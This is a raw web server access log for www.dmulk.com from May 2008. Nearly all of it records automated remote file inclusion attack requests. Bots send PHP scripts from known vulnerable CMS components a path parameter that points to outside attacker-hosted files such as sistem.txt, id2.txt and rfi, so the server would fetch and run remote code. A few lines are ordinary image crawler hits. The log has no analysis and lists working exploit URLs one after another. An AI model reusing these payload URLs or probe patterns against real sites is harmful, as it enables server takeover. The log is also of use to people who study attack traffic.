217.70.129.162 - - [16/May/2008:10:20:38 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
217.70.129.162 - - [16/May/2008:10:20:38 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:20:40 -0700] "GET /logs/access_080111.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [16/May/2008:10:20:45 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:20:49 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:20:50 -0700] "GET /logs/access_080111.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:20:52 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:21:05 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:21:06 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:21:14 -0700] "GET /logs/access_080209.log///squirrelcart/cart_content.php?cart_isp_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:21:15 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.126.239.14 - - [16/May/2008:10:21:15 -0700] "GET /logs///squirrelcart/cart_content.php?cart_isp_root=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:21:22 -0700] "GET /logs//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:21:22 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:25 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:26 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:21:33 -0700] "GET /logs/access.log//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:21:34 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:21:34 -0700] "GET /logs//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:21:34 -0700] "GET /logs/access_080201.log/index.php?pagina=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:36 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:37 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:37 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:21:39 -0700] "GET /logs/index.php?pagina=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [16/May/2008:10:21:40 -0700] "GET /index.php?pagina=http://www.fccmartinsferry.org/trans//tools/images/alba.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.48 - - [16/May/2008:10:21:44 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.feuerwehr-herrsching.de/test/components/com_galleria/upload/rfi?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:21:45 -0700] "GET /logs//login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:21:46 -0700] "GET //login.php?dir=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:56 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:56 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:21:57 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:10:22:17 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
80.67.23.140 - - [16/May/2008:10:22:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
195.70.4.160 - - [16/May/2008:10:22:21 -0700] "GET /logs/access_080213.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.108.197.58 - - [16/May/2008:10:22:44 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
212.108.197.58 - - [16/May/2008:10:22:44 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://southernlivingfurnitureusa.com/news/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
204.3.218.69 - - [16/May/2008:10:22:57 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.58.4.204 - - [16/May/2008:10:23:11 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.58.4.204 - - [16/May/2008:10:23:12 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.los-chamos.com/Fungky/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.47.80.135 - - [16/May/2008:10:23:14 -0700] "GET /mobileoffice/Picture_008.jpg HTTP/1.1" 200 570121 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:23:26 -0700] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:23:27 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.115.49 - - [16/May/2008:10:23:27 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.116.174.9 - - [16/May/2008:10:23:51 -0700] "GET /logs/index.php?option=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:23:57 -0700] "GET /logs/access_071223.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.116.174.9 - - [16/May/2008:10:23:57 -0700] "GET /index.php?option=http://1nb0x.iespana.es/nn.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:10:24:01 -0700] "GET /logs/access_080225.log/samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:10:24:02 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:10:24:03 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:24:04 -0700] "GET /logs/access_080214.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.22 - - [16/May/2008:10:24:05 -0700] "GET /logs/access_080327.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://patch.mandul/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:24:13 -0700] "GET /logs/access_080308.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:24:13 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:24:13 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:24:16 -0700] "GET /logs/access_080226.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:24:20 -0700] "GET /logs/access_080313.log/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:24:37 -0700] "GET /logs//mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:24:38 -0700] "GET //mcf.php?content=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:24:43 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:24:43 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:24:43 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:24:45 -0700] "GET /logs//main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.154.163.32 - - [16/May/2008:10:24:46 -0700] "GET //main.php?sayfa=http://www.erasethedark.com/dlk/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:24:54 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:24:56 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:24:57 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:25:01 -0700] "GET /logs/access_080313.log//index-path.txt/index1.php//doceboCms/class/class.dashboard_cms.php?where_framework=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.203.223.93 - - [16/May/2008:10:25:02 -0700] "GET /logs/access_080313.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.119.200.171 - - [16/May/2008:10:25:09 -0700] "GET /index3.php?http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.119.200.171 - - [16/May/2008:10:25:09 -0700] "GET /logs/index3.php?http://www.daftaretanz.ir//components/com_zoom/classes/iptc/temp.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:25:14 -0700] "GET /logs/access_080212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:25:14 -0700] "GET /logs/access_071222.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.90.204 - - [16/May/2008:10:25:15 -0700] "GET /logs/index3.php?id=http://www.gonta.com.ua/new/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.90.204 - - [16/May/2008:10:25:17 -0700] "GET /index3.php?id=http://www.gonta.com.ua/new/mc??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:25:23 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:25:24 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.97 - - [16/May/2008:10:25:24 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:25:24 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:25:30 -0700] "GET /logs/access_080214.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.81.114 - - [16/May/2008:10:25:34 -0700] "GET /logs/access_080308.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:25:40 -0700] "GET /logs/access_080226.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:25:41 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:25:41 -0700] "GET /samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
119.63.193.186 - - [16/May/2008:10:25:43 -0700] "GET /retreat1/webcam/retreat1_00745.jpg HTTP/1.1" 200 49364 "-" "BaiduImagespider+(+http://www.baidu.jp/search/s308.html)" "www.dmulk.com"
206.53.51.228 - - [16/May/2008:10:25:43 -0700] "GET /logs/access_080120.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.228 - - [16/May/2008:10:25:43 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.228 - - [16/May/2008:10:25:44 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.228 - - [16/May/2008:10:25:44 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.campuswatch.net/calendar//tools/albo/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:25:59 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:26:00 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.6.180.69 - - [16/May/2008:10:26:00 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:26:11 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.35 - - [16/May/2008:10:26:12 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:26:13 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.16.26.124 - - [16/May/2008:10:26:13 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:26:17 -0700] "GET /logs/class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.21.96.16 - - [16/May/2008:10:26:18 -0700] "GET /class.dashboard_cms.php?where_framework=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.220.195.21 - - [16/May/2008:10:26:32 -0700] "GET /logs/access_080313.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.115.202 - - [16/May/2008:10:26:35 -0700] "GET /logs/access_080214.log/samplefaqsupport.php?path[docroot]=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:26:36 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:26:37 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:26:38 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:26:39 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:26:40 -0700] "GET /logs/access_080212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.173.48.114 - - [16/May/2008:10:26:40 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://h1.ripway.com/hostings/idKORN.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.249.194 - - [16/May/2008:10:26:40 -0700] "GET /logs/access_071222.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.178.228.12 - - [16/May/2008:10:26:43 -0700] "GET /logs/samplefaqsupport.php?path[docroot]=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
